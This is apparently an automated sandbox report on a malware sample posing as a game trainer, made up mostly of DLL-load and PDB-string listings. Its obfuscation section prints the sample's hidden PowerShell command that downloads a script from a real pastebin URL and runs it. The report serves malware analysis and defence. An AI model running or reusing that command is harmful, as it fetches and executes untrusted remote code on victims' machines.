Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.1.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\mscorlib.pdbl] source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll\YC source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb4e089 source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAf9(@ source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdbhP source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb$ source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb] source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbw source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdb source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbk source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbl source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb? source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbY source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbpw source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdbc source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb9 source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844743189.000002409836E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdbA* source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbc source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbix source: powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbo source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb% source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: Stand_Trainer_Updated.exe.1.drStatic PE information: 0xEDF7F89D [Fri Jul 6 22:13:49 2096 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC6300BD pushad ; iretd 1_2_00007FFAAC6300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC70A843 pushad ; ret 1_2_00007FFAAC70A841
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC70585B push ebx; retf 1_2_00007FFAAC7059DA
